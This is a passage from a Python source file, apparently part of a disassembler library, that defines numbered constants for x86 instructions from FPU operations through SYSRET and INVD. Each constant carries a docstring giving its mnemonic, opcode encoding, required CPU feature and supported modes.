``DD /7``
``8087+``
``16/32/64-bit``
"""
FSTSW_M2BYTE: int = 616
"""
``FSTSW m2byte``
``9B DD /7``
``8087+``
``16/32/64-bit``
"""
FFREE_STI: int = 617
"""
``FFREE ST(i)``
``DD C0+i``
``8087+``
``16/32/64-bit``
"""
FXCH_ST0_STI_DDC8: int = 618
"""
``FXCH ST(i)``
``DD C8+i``
``8087+``
``16/32/64-bit``
"""
FST_STI: int = 619
"""
``FST ST(i)``
``DD D0+i``
``8087+``
``16/32/64-bit``
"""
FSTP_STI: int = 620
"""
``FSTP ST(i)``
``DD D8+i``
``8087+``
``16/32/64-bit``
"""
FUCOM_ST0_STI: int = 621
"""
``FUCOM ST(i)``
``DD E0+i``
``8087+``
``16/32/64-bit``
"""
FUCOMP_ST0_STI: int = 622
"""
``FUCOMP ST(i)``
``DD E8+i``
``8087+``
``16/32/64-bit``
"""
FIADD_M16INT: int = 623
"""
``FIADD m16int``
``DE /0``
``8087+``
``16/32/64-bit``
"""
FIMUL_M16INT: int = 624
"""
``FIMUL m16int``
``DE /1``
``8087+``
``16/32/64-bit``
"""
FICOM_M16INT: int = 625
"""
``FICOM m16int``
``DE /2``
``8087+``
``16/32/64-bit``
"""
FICOMP_M16INT: int = 626
"""
``FICOMP m16int``
``DE /3``
``8087+``
``16/32/64-bit``
"""
FISUB_M16INT: int = 627
"""
``FISUB m16int``
``DE /4``
``8087+``
``16/32/64-bit``
"""
FISUBR_M16INT: int = 628
"""
``FISUBR m16int``
``DE /5``
``8087+``
``16/32/64-bit``
"""
FIDIV_M16INT: int = 629
"""
``FIDIV m16int``
``DE /6``
``8087+``
``16/32/64-bit``
"""
FIDIVR_M16INT: int = 630
"""
``FIDIVR m16int``
``DE /7``
``8087+``
``16/32/64-bit``
"""
FADDP_STI_ST0: int = 631
"""
``FADDP ST(i), ST(0)``
``DE C0+i``
``8087+``
``16/32/64-bit``
"""
FMULP_STI_ST0: int = 632
"""
``FMULP ST(i), ST(0)``
``DE C8+i``
``8087+``
``16/32/64-bit``
"""
FCOMP_ST0_STI_DED0: int = 633
"""
``FCOMP ST(i)``
``DE D0+i``
``8087+``
``16/32/64-bit``
"""
FCOMPP: int = 634
"""
``FCOMPP``
``DE D9``
``8087+``
``16/32/64-bit``
"""
FSUBRP_STI_ST0: int = 635
"""
``FSUBRP ST(i), ST(0)``
``DE E0+i``
``8087+``
``16/32/64-bit``
"""
FSUBP_STI_ST0: int = 636
"""
``FSUBP ST(i), ST(0)``
``DE E8+i``
``8087+``
``16/32/64-bit``
"""
FDIVRP_STI_ST0: int = 637
"""
``FDIVRP ST(i), ST(0)``
``DE F0+i``
``8087+``
``16/32/64-bit``
"""
FDIVP_STI_ST0: int = 638
"""
``FDIVP ST(i), ST(0)``
``DE F8+i``
``8087+``
``16/32/64-bit``
"""
FILD_M16INT: int = 639
"""
``FILD m16int``
``DF /0``
``8087+``
``16/32/64-bit``
"""
FISTTP_M16INT: int = 640
"""
``FISTTP m16int``
``DF /1``
``8087+ and SSE3``
``16/32/64-bit``
"""
FIST_M16INT: int = 641
"""
``FIST m16int``
``DF /2``
``8087+``
``16/32/64-bit``
"""
FISTP_M16INT: int = 642
"""
``FISTP m16int``
``DF /3``
``8087+``
``16/32/64-bit``
"""
FBLD_M80BCD: int = 643
"""
``FBLD m80bcd``
``DF /4``
``8087+``
``16/32/64-bit``
"""
FILD_M64INT: int = 644
"""
``FILD m64int``
``DF /5``
``8087+``
``16/32/64-bit``
"""
FBSTP_M80BCD: int = 645
"""
``FBSTP m80bcd``
``DF /6``
``8087+``
``16/32/64-bit``
"""
FISTP_M64INT: int = 646
"""
``FISTP m64int``
``DF /7``
``8087+``
``16/32/64-bit``
"""
FFREEP_STI: int = 647
"""
``FFREEP ST(i)``
``DF C0+i``
``8087+``
``16/32/64-bit``
"""
FXCH_ST0_STI_DFC8: int = 648
"""
``FXCH ST(i)``
``DF C8+i``
``8087+``
``16/32/64-bit``
"""
FSTP_STI_DFD0: int = 649
"""
``FSTP ST(i)``
``DF D0+i``
``8087+``
``16/32/64-bit``
"""
FSTP_STI_DFD8: int = 650
"""
``FSTP ST(i)``
``DF D8+i``
``8087+``
``16/32/64-bit``
"""
FNSTSW_AX: int = 651
"""
``FNSTSW AX``
``DF E0``
``287+``
``16/32/64-bit``
"""
FSTSW_AX: int = 652
"""
``FSTSW AX``
``9B DF E0``
``287+``
``16/32/64-bit``
"""
FSTDW_AX: int = 653
"""
``FSTDW AX``
``9B DF E1``
``387 SL``
``16/32-bit``
"""
FSTSG_AX: int = 654
"""
``FSTSG AX``
``9B DF E2``
``387 SL``
``16/32-bit``
"""
FUCOMIP_ST0_STI: int = 655
"""
``FUCOMIP ST, ST(i)``
``DF E8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCOMIP_ST0_STI: int = 656
"""
``FCOMIP ST, ST(i)``
``DF F0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
LOOPNE_REL8_16_CX: int = 657
"""
``LOOPNE rel8``
``a16 o16 E0 cb``
``8086+``
``16/32-bit``
"""
LOOPNE_REL8_32_CX: int = 658
"""
``LOOPNE rel8``
``a16 o32 E0 cb``
``386+``
``16/32-bit``
"""
LOOPNE_REL8_16_ECX: int = 659
"""
``LOOPNE rel8``
``a32 o16 E0 cb``
``386+``
``16/32/64-bit``
"""
LOOPNE_REL8_32_ECX: int = 660
"""
``LOOPNE rel8``
``a32 o32 E0 cb``
``386+``
``16/32-bit``
"""
LOOPNE_REL8_64_ECX: int = 661
"""
``LOOPNE rel8``
``a32 o64 E0 cb``
``X64``
``64-bit``
"""
LOOPNE_REL8_16_RCX: int = 662
"""
``LOOPNE rel8``
``a64 o16 E0 cb``
``X64``
``64-bit``
"""
LOOPNE_REL8_64_RCX: int = 663
"""
``LOOPNE rel8``
``a64 o64 E0 cb``
``X64``
``64-bit``
"""
LOOPE_REL8_16_CX: int = 664
"""
``LOOPE rel8``
``a16 o16 E1 cb``
``8086+``
``16/32-bit``
"""
LOOPE_REL8_32_CX: int = 665
"""
``LOOPE rel8``
``a16 o32 E1 cb``
``386+``
``16/32-bit``
"""
LOOPE_REL8_16_ECX: int = 666
"""
``LOOPE rel8``
``a32 o16 E1 cb``
``386+``
``16/32/64-bit``
"""
LOOPE_REL8_32_ECX: int = 667
"""
``LOOPE rel8``
``a32 o32 E1 cb``
``386+``
``16/32-bit``
"""
LOOPE_REL8_64_ECX: int = 668
"""
``LOOPE rel8``
``a32 o64 E1 cb``
``X64``
``64-bit``
"""
LOOPE_REL8_16_RCX: int = 669
"""
``LOOPE rel8``
``a64 o16 E1 cb``
``X64``
``64-bit``
"""
LOOPE_REL8_64_RCX: int = 670
"""
``LOOPE rel8``
``a64 o64 E1 cb``
``X64``
``64-bit``
"""
LOOP_REL8_16_CX: int = 671
"""
``LOOP rel8``
``a16 o16 E2 cb``
``8086+``
``16/32-bit``
"""
LOOP_REL8_32_CX: int = 672
"""
``LOOP rel8``
``a16 o32 E2 cb``
``386+``
``16/32-bit``
"""
LOOP_REL8_16_ECX: int = 673
"""
``LOOP rel8``
``a32 o16 E2 cb``
``386+``
``16/32/64-bit``
"""
LOOP_REL8_32_ECX: int = 674
"""
``LOOP rel8``
``a32 o32 E2 cb``
``386+``
``16/32-bit``
"""
LOOP_REL8_64_ECX: int = 675
"""
``LOOP rel8``
``a32 o64 E2 cb``
``X64``
``64-bit``
"""
LOOP_REL8_16_RCX: int = 676
"""
``LOOP rel8``
``a64 o16 E2 cb``
``X64``
``64-bit``
"""
LOOP_REL8_64_RCX: int = 677
"""
``LOOP rel8``
``a64 o64 E2 cb``
``X64``
``64-bit``
"""
JCXZ_REL8_16: int = 678
"""
``JCXZ rel8``
``a16 o16 E3 cb``
``8086+``
``16/32-bit``
"""
JCXZ_REL8_32: int = 679
"""
``JCXZ rel8``
``a16 o32 E3 cb``
``386+``
``16/32-bit``
"""
JECXZ_REL8_16: int = 680
"""
``JECXZ rel8``
``a32 o16 E3 cb``
``386+``
``16/32/64-bit``
"""
JECXZ_REL8_32: int = 681
"""
``JECXZ rel8``
``a32 o32 E3 cb``
``386+``
``16/32-bit``
"""
JECXZ_REL8_64: int = 682
"""
``JECXZ rel8``
``a32 o64 E3 cb``
``X64``
``64-bit``
"""
JRCXZ_REL8_16: int = 683
"""
``JRCXZ rel8``
``a64 o16 E3 cb``
``X64``
``64-bit``
"""
JRCXZ_REL8_64: int = 684
"""
``JRCXZ rel8``
``a64 o64 E3 cb``
``X64``
``64-bit``
"""
IN_AL_IMM8: int = 685
"""
``IN AL, imm8``
``E4 ib``
``8086+``
``16/32/64-bit``
"""
IN_AX_IMM8: int = 686
"""
``IN AX, imm8``
``o16 E5 ib``
``8086+``
``16/32/64-bit``
"""
IN_EAX_IMM8: int = 687
"""
``IN EAX, imm8``
``o32 E5 ib``
``386+``
``16/32/64-bit``
"""
OUT_IMM8_AL: int = 688
"""
``OUT imm8, AL``
``E6 ib``
``8086+``
``16/32/64-bit``
"""
OUT_IMM8_AX: int = 689
"""
``OUT imm8, AX``
``o16 E7 ib``
``8086+``
``16/32/64-bit``
"""
OUT_IMM8_EAX: int = 690
"""
``OUT imm8, EAX``
``o32 E7 ib``
``386+``
``16/32/64-bit``
"""
CALL_REL16: int = 691
"""
``CALL rel16``
``o16 E8 cw``
``8086+``
``16/32/64-bit``
"""
CALL_REL32_32: int = 692
"""
``CALL rel32``
``o32 E8 cd``
``386+``
``16/32-bit``
"""
CALL_REL32_64: int = 693
"""
``CALL rel32``
``o64 E8 cd``
``X64``
``64-bit``
"""
JMP_REL16: int = 694
"""
``JMP rel16``
``o16 E9 cw``
``8086+``
``16/32/64-bit``
"""
JMP_REL32_32: int = 695
"""
``JMP rel32``
``o32 E9 cd``
``386+``
``16/32-bit``
"""
JMP_REL32_64: int = 696
"""
``JMP rel32``
``o64 E9 cd``
``X64``
``64-bit``
"""
JMP_PTR1616: int = 697
"""
``JMP ptr16:16``
``o16 EA cd``
``8086+``
``16/32-bit``
"""
JMP_PTR1632: int = 698
"""
``JMP ptr16:32``
``o32 EA cp``
``386+``
``16/32-bit``
"""
JMP_REL8_16: int = 699
"""
``JMP rel8``
``o16 EB cb``
``8086+``
``16/32/64-bit``
"""
JMP_REL8_32: int = 700
"""
``JMP rel8``
``o32 EB cb``
``386+``
``16/32-bit``
"""
JMP_REL8_64: int = 701
"""
``JMP rel8``
``o64 EB cb``
``X64``
``64-bit``
"""
IN_AL_DX: int = 702
"""
``IN AL, DX``
``EC``
``8086+``
``16/32/64-bit``
"""
IN_AX_DX: int = 703
"""
``IN AX, DX``
``o16 ED``
``8086+``
``16/32/64-bit``
"""
IN_EAX_DX: int = 704
"""
``IN EAX, DX``
``o32 ED``
``386+``
``16/32/64-bit``
"""
OUT_DX_AL: int = 705
"""
``OUT DX, AL``
``EE``
``8086+``
``16/32/64-bit``
"""
OUT_DX_AX: int = 706
"""
``OUT DX, AX``
``o16 EF``
``8086+``
``16/32/64-bit``
"""
OUT_DX_EAX: int = 707
"""
``OUT DX, EAX``
``o32 EF``
``386+``
``16/32/64-bit``
"""
INT1: int = 708
"""
``INT1``
``F1``
``386+``
``16/32/64-bit``
"""
HLT: int = 709
"""
``HLT``
``F4``
``8086+``
``16/32/64-bit``
"""
CMC: int = 710
"""
``CMC``
``F5``
``8086+``
``16/32/64-bit``
"""
TEST_RM8_IMM8: int = 711
"""
``TEST r/m8, imm8``
``F6 /0 ib``
``8086+``
``16/32/64-bit``
"""
TEST_RM8_IMM8_F6R1: int = 712
"""
``TEST r/m8, imm8``
``F6 /1 ib``
``8086+``
``16/32/64-bit``
"""
NOT_RM8: int = 713
"""
``NOT r/m8``
``F6 /2``
``8086+``
``16/32/64-bit``
"""
NEG_RM8: int = 714
"""
``NEG r/m8``
``F6 /3``
``8086+``
``16/32/64-bit``
"""
MUL_RM8: int = 715
"""
``MUL r/m8``
``F6 /4``
``8086+``
``16/32/64-bit``
"""
IMUL_RM8: int = 716
"""
``IMUL r/m8``
``F6 /5``
``8086+``
``16/32/64-bit``
"""
DIV_RM8: int = 717
"""
``DIV r/m8``
``F6 /6``
``8086+``
``16/32/64-bit``
"""
IDIV_RM8: int = 718
"""
``IDIV r/m8``
``F6 /7``
``8086+``
``16/32/64-bit``
"""
TEST_RM16_IMM16: int = 719
"""
``TEST r/m16, imm16``
``o16 F7 /0 iw``
``8086+``
``16/32/64-bit``
"""
TEST_RM32_IMM32: int = 720
"""
``TEST r/m32, imm32``
``o32 F7 /0 id``
``386+``
``16/32/64-bit``
"""
TEST_RM64_IMM32: int = 721
"""
``TEST r/m64, imm32``
``o64 F7 /0 id``
``X64``
``64-bit``
"""
TEST_RM16_IMM16_F7R1: int = 722
"""
``TEST r/m16, imm16``
``o16 F7 /1 iw``
``8086+``
``16/32/64-bit``
"""
TEST_RM32_IMM32_F7R1: int = 723
"""
``TEST r/m32, imm32``
``o32 F7 /1 id``
``386+``
``16/32/64-bit``
"""
TEST_RM64_IMM32_F7R1: int = 724
"""
``TEST r/m64, imm32``
``o64 F7 /1 id``
``X64``
``64-bit``
"""
NOT_RM16: int = 725
"""
``NOT r/m16``
``o16 F7 /2``
``8086+``
``16/32/64-bit``
"""
NOT_RM32: int = 726
"""
``NOT r/m32``
``o32 F7 /2``
``386+``
``16/32/64-bit``
"""
NOT_RM64: int = 727
"""
``NOT r/m64``
``o64 F7 /2``
``X64``
``64-bit``
"""
NEG_RM16: int = 728
"""
``NEG r/m16``
``o16 F7 /3``
``8086+``
``16/32/64-bit``
"""
NEG_RM32: int = 729
"""
``NEG r/m32``
``o32 F7 /3``
``386+``
``16/32/64-bit``
"""
NEG_RM64: int = 730
"""
``NEG r/m64``
``o64 F7 /3``
``X64``
``64-bit``
"""
MUL_RM16: int = 731
"""
``MUL r/m16``
``o16 F7 /4``
``8086+``
``16/32/64-bit``
"""
MUL_RM32: int = 732
"""
``MUL r/m32``
``o32 F7 /4``
``386+``
``16/32/64-bit``
"""
MUL_RM64: int = 733
"""
``MUL r/m64``
``o64 F7 /4``
``X64``
``64-bit``
"""
IMUL_RM16: int = 734
"""
``IMUL r/m16``
``o16 F7 /5``
``8086+``
``16/32/64-bit``
"""
IMUL_RM32: int = 735
"""
``IMUL r/m32``
``o32 F7 /5``
``386+``
``16/32/64-bit``
"""
IMUL_RM64: int = 736
"""
``IMUL r/m64``
``o64 F7 /5``
``X64``
``64-bit``
"""
DIV_RM16: int = 737
"""
``DIV r/m16``
``o16 F7 /6``
``8086+``
``16/32/64-bit``
"""
DIV_RM32: int = 738
"""
``DIV r/m32``
``o32 F7 /6``
``386+``
``16/32/64-bit``
"""
DIV_RM64: int = 739
"""
``DIV r/m64``
``o64 F7 /6``
``X64``
``64-bit``
"""
IDIV_RM16: int = 740
"""
``IDIV r/m16``
``o16 F7 /7``
``8086+``
``16/32/64-bit``
"""
IDIV_RM32: int = 741
"""
``IDIV r/m32``
``o32 F7 /7``
``386+``
``16/32/64-bit``
"""
IDIV_RM64: int = 742
"""
``IDIV r/m64``
``o64 F7 /7``
``X64``
``64-bit``
"""
CLC: int = 743
"""
``CLC``
``F8``
``8086+``
``16/32/64-bit``
"""
STC: int = 744
"""
``STC``
``F9``
``8086+``
``16/32/64-bit``
"""
CLI: int = 745
"""
``CLI``
``FA``
``8086+``
``16/32/64-bit``
"""
STI: int = 746
"""
``STI``
``FB``
``8086+``
``16/32/64-bit``
"""
CLD: int = 747
"""
``CLD``
``FC``
``8086+``
``16/32/64-bit``
"""
STD: int = 748
"""
``STD``
``FD``
``8086+``
``16/32/64-bit``
"""
INC_RM8: int = 749
"""
``INC r/m8``
``FE /0``
``8086+``
``16/32/64-bit``
"""
DEC_RM8: int = 750
"""
``DEC r/m8``
``FE /1``
``8086+``
``16/32/64-bit``
"""
INC_RM16: int = 751
"""
``INC r/m16``
``o16 FF /0``
``8086+``
``16/32/64-bit``
"""
INC_RM32: int = 752
"""
``INC r/m32``
``o32 FF /0``
``386+``
``16/32/64-bit``
"""
INC_RM64: int = 753
"""
``INC r/m64``
``o64 FF /0``
``X64``
``64-bit``
"""
DEC_RM16: int = 754
"""
``DEC r/m16``
``o16 FF /1``
``8086+``
``16/32/64-bit``
"""
DEC_RM32: int = 755
"""
``DEC r/m32``
``o32 FF /1``
``386+``
``16/32/64-bit``
"""
DEC_RM64: int = 756
"""
``DEC r/m64``
``o64 FF /1``
``X64``
``64-bit``
"""
CALL_RM16: int = 757
"""
``CALL r/m16``
``o16 FF /2``
``8086+``
``16/32/64-bit``
"""
CALL_RM32: int = 758
"""
``CALL r/m32``
``o32 FF /2``
``386+``
``16/32-bit``
"""
CALL_RM64: int = 759
"""
``CALL r/m64``
``o64 FF /2``
``X64``
``64-bit``
"""
CALL_M1616: int = 760
"""
``CALL m16:16``
``o16 FF /3``
``8086+``
``16/32/64-bit``
"""
CALL_M1632: int = 761
"""
``CALL m16:32``
``o32 FF /3``
``386+``
``16/32/64-bit``
"""
CALL_M1664: int = 762
"""
``CALL m16:64``
``o64 FF /3``
``X64``
``64-bit``
"""
JMP_RM16: int = 763
"""
``JMP r/m16``
``o16 FF /4``
``8086+``
``16/32/64-bit``
"""
JMP_RM32: int = 764
"""
``JMP r/m32``
``o32 FF /4``
``386+``
``16/32-bit``
"""
JMP_RM64: int = 765
"""
``JMP r/m64``
``o64 FF /4``
``X64``
``64-bit``
"""
JMP_M1616: int = 766
"""
``JMP m16:16``
``o16 FF /5``
``8086+``
``16/32/64-bit``
"""
JMP_M1632: int = 767
"""
``JMP m16:32``
``o32 FF /5``
``386+``
``16/32/64-bit``
"""
JMP_M1664: int = 768
"""
``JMP m16:64``
``o64 FF /5``
``X64``
``64-bit``
"""
PUSH_RM16: int = 769
"""
``PUSH r/m16``
``o16 FF /6``
``8086+``
``16/32/64-bit``
"""
PUSH_RM32: int = 770
"""
``PUSH r/m32``
``o32 FF /6``
``386+``
``16/32-bit``
"""
PUSH_RM64: int = 771
"""
``PUSH r/m64``
``o64 FF /6``
``X64``
``64-bit``
"""
SLDT_RM16: int = 772
"""
``SLDT r/m16``
``o16 0F 00 /0``
``286+``
``16/32/64-bit``
"""
SLDT_R32M16: int = 773
"""
``SLDT r32/m16``
``o32 0F 00 /0``
``386+``
``16/32/64-bit``
"""
SLDT_R64M16: int = 774
"""
``SLDT r64/m16``
``o64 0F 00 /0``
``X64``
``64-bit``
"""
STR_RM16: int = 775
"""
``STR r/m16``
``o16 0F 00 /1``
``286+``
``16/32/64-bit``
"""
STR_R32M16: int = 776
"""
``STR r32/m16``
``o32 0F 00 /1``
``386+``
``16/32/64-bit``
"""
STR_R64M16: int = 777
"""
``STR r64/m16``
``o64 0F 00 /1``
``X64``
``64-bit``
"""
LLDT_RM16: int = 778
"""
``LLDT r/m16``
``o16 0F 00 /2``
``286+``
``16/32/64-bit``
"""
LLDT_R32M16: int = 779
"""
``LLDT r32/m16``
``o32 0F 00 /2``
``386+``
``16/32/64-bit``
"""
LLDT_R64M16: int = 780
"""
``LLDT r64/m16``
``o64 0F 00 /2``
``X64``
``64-bit``
"""
LTR_RM16: int = 781
"""
``LTR r/m16``
``o16 0F 00 /3``
``286+``
``16/32/64-bit``
"""
LTR_R32M16: int = 782
"""
``LTR r32/m16``
``o32 0F 00 /3``
``386+``
``16/32/64-bit``
"""
LTR_R64M16: int = 783
"""
``LTR r64/m16``
``o64 0F 00 /3``
``X64``
``64-bit``
"""
VERR_RM16: int = 784
"""
``VERR r/m16``
``o16 0F 00 /4``
``286+``
``16/32/64-bit``
"""
VERR_R32M16: int = 785
"""
``VERR r32/m16``
``o32 0F 00 /4``
``386+``
``16/32/64-bit``
"""
VERR_R64M16: int = 786
"""
``VERR r64/m16``
``o64 0F 00 /4``
``X64``
``64-bit``
"""
VERW_RM16: int = 787
"""
``VERW r/m16``
``o16 0F 00 /5``
``286+``
``16/32/64-bit``
"""
VERW_R32M16: int = 788
"""
``VERW r32/m16``
``o32 0F 00 /5``
``386+``
``16/32/64-bit``
"""
VERW_R64M16: int = 789
"""
``VERW r64/m16``
``o64 0F 00 /5``
``X64``
``64-bit``
"""
JMPE_RM16: int = 790
"""
``JMPE r/m16``
``o16 0F 00 /6``
``IA-64``
``16/32-bit``
"""
JMPE_RM32: int = 791
"""
``JMPE r/m32``
``o32 0F 00 /6``
``IA-64``
``16/32-bit``
"""
SGDT_M1632_16: int = 792
"""
``SGDT m``
``o16 0F 01 /0``
``286+``
``16/32-bit``
"""
SGDT_M1632: int = 793
"""
``SGDT m``
``o32 0F 01 /0``
``386+``
``16/32-bit``
"""
SGDT_M1664: int = 794
"""
``SGDT m``
``0F 01 /0``
``X64``
``64-bit``
"""
SIDT_M1632_16: int = 795
"""
``SIDT m``
``o16 0F 01 /1``
``286+``
``16/32-bit``
"""
SIDT_M1632: int = 796
"""
``SIDT m``
``o32 0F 01 /1``
``386+``
``16/32-bit``
"""
SIDT_M1664: int = 797
"""
``SIDT m``
``0F 01 /1``
``X64``
``64-bit``
"""
LGDT_M1632_16: int = 798
"""
``LGDT m16&32``
``o16 0F 01 /2``
``286+``
``16/32-bit``
"""
LGDT_M1632: int = 799
"""
``LGDT m16&32``
``o32 0F 01 /2``
``386+``
``16/32-bit``
"""
LGDT_M1664: int = 800
"""
``LGDT m16&64``
``0F 01 /2``
``X64``
``64-bit``
"""
LIDT_M1632_16: int = 801
"""
``LIDT m16&32``
``o16 0F 01 /3``
``286+``
``16/32-bit``
"""
LIDT_M1632: int = 802
"""
``LIDT m16&32``
``o32 0F 01 /3``
``386+``
``16/32-bit``
"""
LIDT_M1664: int = 803
"""
``LIDT m16&64``
``0F 01 /3``
``X64``
``64-bit``
"""
SMSW_RM16: int = 804
"""
``SMSW r/m16``
``o16 0F 01 /4``
``286+``
``16/32/64-bit``
"""
SMSW_R32M16: int = 805
"""
``SMSW r32/m16``
``o32 0F 01 /4``
``386+``
``16/32/64-bit``
"""
SMSW_R64M16: int = 806
"""
``SMSW r64/m16``
``o64 0F 01 /4``
``X64``
``64-bit``
"""
RSTORSSP_M64: int = 807
"""
``RSTORSSP m64``
``F3 0F 01 /5``
``CET_SS``
``16/32/64-bit``
"""
LMSW_RM16: int = 808
"""
``LMSW r/m16``
``o16 0F 01 /6``
``286+``
``16/32/64-bit``
"""
LMSW_R32M16: int = 809
"""
``LMSW r32/m16``
``o32 0F 01 /6``
``386+``
``16/32/64-bit``
"""
LMSW_R64M16: int = 810
"""
``LMSW r64/m16``
``o64 0F 01 /6``
``X64``
``64-bit``
"""
INVLPG_M: int = 811
"""
``INVLPG m``
``0F 01 /7``
``486+``
``16/32/64-bit``
"""
ENCLV: int = 812
"""
``ENCLV``
``NP 0F 01 C0``
``OSS``
``16/32/64-bit``
"""
VMCALL: int = 813
"""
``VMCALL``
``NP 0F 01 C1``
``VMX``
``16/32/64-bit``
"""
VMLAUNCH: int = 814
"""
``VMLAUNCH``
``NP 0F 01 C2``
``VMX``
``16/32/64-bit``
"""
VMRESUME: int = 815
"""
``VMRESUME``
``NP 0F 01 C3``
``VMX``
``16/32/64-bit``
"""
VMXOFF: int = 816
"""
``VMXOFF``
``NP 0F 01 C4``
``VMX``
``16/32/64-bit``
"""
PCONFIG: int = 817
"""
``PCONFIG``
``NP 0F 01 C5``
``PCONFIG``
``16/32/64-bit``
"""
MONITORW: int = 818
"""
``MONITOR``
``a16 NP 0F 01 C8``
``MONITOR``
``16/32-bit``
"""
MONITORD: int = 819
"""
``MONITOR``
``a32 NP 0F 01 C8``
``MONITOR``
``16/32/64-bit``
"""
MONITORQ: int = 820
"""
``MONITOR``
``a64 NP 0F 01 C8``
``MONITOR``
``64-bit``
"""
MWAIT: int = 821
"""
``MWAIT``
``NP 0F 01 C9``
``MONITOR``
``16/32/64-bit``
"""
CLAC: int = 822
"""
``CLAC``
``NP 0F 01 CA``
``SMAP``
``16/32/64-bit``
"""
STAC: int = 823
"""
``STAC``
``NP 0F 01 CB``
``SMAP``
``16/32/64-bit``
"""
ENCLS: int = 824
"""
``ENCLS``
``NP 0F 01 CF``
``SGX1``
``16/32/64-bit``
"""
XGETBV: int = 825
"""
``XGETBV``
``NP 0F 01 D0``
``XSAVE``
``16/32/64-bit``
"""
XSETBV: int = 826
"""
``XSETBV``
``NP 0F 01 D1``
``XSAVE``
``16/32/64-bit``
"""
VMFUNC: int = 827
"""
``VMFUNC``
``NP 0F 01 D4``
``VMX``
``16/32/64-bit``
"""
XEND: int = 828
"""
``XEND``
``NP 0F 01 D5``
``RTM``
``16/32/64-bit``
"""
XTEST: int = 829
"""
``XTEST``
``NP 0F 01 D6``
``HLE or RTM``
``16/32/64-bit``
"""
ENCLU: int = 830
"""
``ENCLU``
``NP 0F 01 D7``
``SGX1``
``16/32/64-bit``
"""
VMRUNW: int = 831
"""
``VMRUN``
``a16 0F 01 D8``
``SVM``
``16/32-bit``
"""
VMRUND: int = 832
"""
``VMRUN``
``a32 0F 01 D8``
``SVM``
``16/32/64-bit``
"""
VMRUNQ: int = 833
"""
``VMRUN``
``a64 0F 01 D8``
``SVM``
``64-bit``
"""
VMMCALL: int = 834
"""
``VMMCALL``
``0F 01 D9``
``SVM``
``16/32/64-bit``
"""
VMLOADW: int = 835
"""
``VMLOAD``
``a16 0F 01 DA``
``SVM``
``16/32-bit``
"""
VMLOADD: int = 836
"""
``VMLOAD``
``a32 0F 01 DA``
``SVM``
``16/32/64-bit``
"""
VMLOADQ: int = 837
"""
``VMLOAD``
``a64 0F 01 DA``
``SVM``
``64-bit``
"""
VMSAVEW: int = 838
"""
``VMSAVE``
``a16 0F 01 DB``
``SVM``
``16/32-bit``
"""
VMSAVED: int = 839
"""
``VMSAVE``
``a32 0F 01 DB``
``SVM``
``16/32/64-bit``
"""
VMSAVEQ: int = 840
"""
``VMSAVE``
``a64 0F 01 DB``
``SVM``
``64-bit``
"""
STGI: int = 841
"""
``STGI``
``0F 01 DC``
``SKINIT or SVM``
``16/32/64-bit``
"""
CLGI: int = 842
"""
``CLGI``
``0F 01 DD``
``SVM``
``16/32/64-bit``
"""
SKINIT: int = 843
"""
``SKINIT``
``0F 01 DE``
``SKINIT or SVM``
``16/32/64-bit``
"""
INVLPGAW: int = 844
"""
``INVLPGA``
``a16 0F 01 DF``
``SVM``
``16/32-bit``
"""
INVLPGAD: int = 845
"""
``INVLPGA``
``a32 0F 01 DF``
``SVM``
``16/32/64-bit``
"""
INVLPGAQ: int = 846
"""
``INVLPGA``
``a64 0F 01 DF``
``SVM``
``64-bit``
"""
SETSSBSY: int = 847
"""
``SETSSBSY``
``F3 0F 01 E8``
``CET_SS``
``16/32/64-bit``
"""
SAVEPREVSSP: int = 848
"""
``SAVEPREVSSP``
``F3 0F 01 EA``
``CET_SS``
``16/32/64-bit``
"""
RDPKRU: int = 849
"""
``RDPKRU``
``NP 0F 01 EE``
``PKU``
``16/32/64-bit``
"""
WRPKRU: int = 850
"""
``WRPKRU``
``NP 0F 01 EF``
``PKU``
``16/32/64-bit``
"""
SWAPGS: int = 851
"""
``SWAPGS``
``0F 01 F8``
``X64``
``64-bit``
"""
RDTSCP: int = 852
"""
``RDTSCP``
``0F 01 F9``
``RDTSCP``
``16/32/64-bit``
"""
MONITORXW: int = 853
"""
``MONITORX``
``a16 NP 0F 01 FA``
``MONITORX``
``16/32-bit``
"""
MONITORXD: int = 854
"""
``MONITORX``
``a32 NP 0F 01 FA``
``MONITORX``
``16/32/64-bit``
"""
MONITORXQ: int = 855
"""
``MONITORX``
``a64 NP 0F 01 FA``
``MONITORX``
``64-bit``
"""
MCOMMIT: int = 856
"""
``MCOMMIT``
``F3 0F 01 FA``
``MCOMMIT``
``16/32/64-bit``
"""
MWAITX: int = 857
"""
``MWAITX``
``NP 0F 01 FB``
``MONITORX``
``16/32/64-bit``
"""
CLZEROW: int = 858
"""
``CLZERO``
``a16 0F 01 FC``
``CLZERO``
``16/32-bit``
"""
CLZEROD: int = 859
"""
``CLZERO``
``a32 0F 01 FC``
``CLZERO``
``16/32/64-bit``
"""
CLZEROQ: int = 860
"""
``CLZERO``
``a64 0F 01 FC``
``CLZERO``
``64-bit``
"""
RDPRU: int = 861
"""
``RDPRU``
``0F 01 FD``
``RDPRU``
``16/32/64-bit``
"""
LAR_R16_RM16: int = 862
"""
``LAR r16, r/m16``
``o16 0F 02 /r``
``286+``
``16/32/64-bit``
"""
LAR_R32_R32M16: int = 863
"""
``LAR r32, r32/m16``
``o32 0F 02 /r``
``386+``
``16/32/64-bit``
"""
LAR_R64_R64M16: int = 864
"""
``LAR r64, r64/m16``
``o64 0F 02 /r``
``X64``
``64-bit``
"""
LSL_R16_RM16: int = 865
"""
``LSL r16, r/m16``
``o16 0F 03 /r``
``286+``
``16/32/64-bit``
"""
LSL_R32_R32M16: int = 866
"""
``LSL r32, r32/m16``
``o32 0F 03 /r``
``386+``
``16/32/64-bit``
"""
LSL_R64_R64M16: int = 867
"""
``LSL r64, r64/m16``
``o64 0F 03 /r``
``X64``
``64-bit``
"""
STOREALL: int = 868
"""
``STOREALL``
``0F 04``
``286``
``16/32-bit``
"""
LOADALL286: int = 869
"""
``LOADALL``
``0F 05``
``286``
``16/32-bit``
"""
SYSCALL: int = 870
"""
``SYSCALL``
``0F 05``
``SYSCALL``
``16/32/64-bit``
"""
CLTS: int = 871
"""
``CLTS``
``0F 06``
``286+``
``16/32/64-bit``
"""
LOADALL386: int = 872
"""
``LOADALL``
``0F 07``
``386``
``16/32-bit``
"""
SYSRETD: int = 873
"""
``SYSRET``
``0F 07``
``SYSCALL``
``16/32/64-bit``
"""
SYSRETQ: int = 874
"""
``SYSRETQ``
``o64 0F 07``
``SYSCALL``
``64-bit``
"""
INVD: int = 875
"""
``INVD``
``0F 08``
``486+``
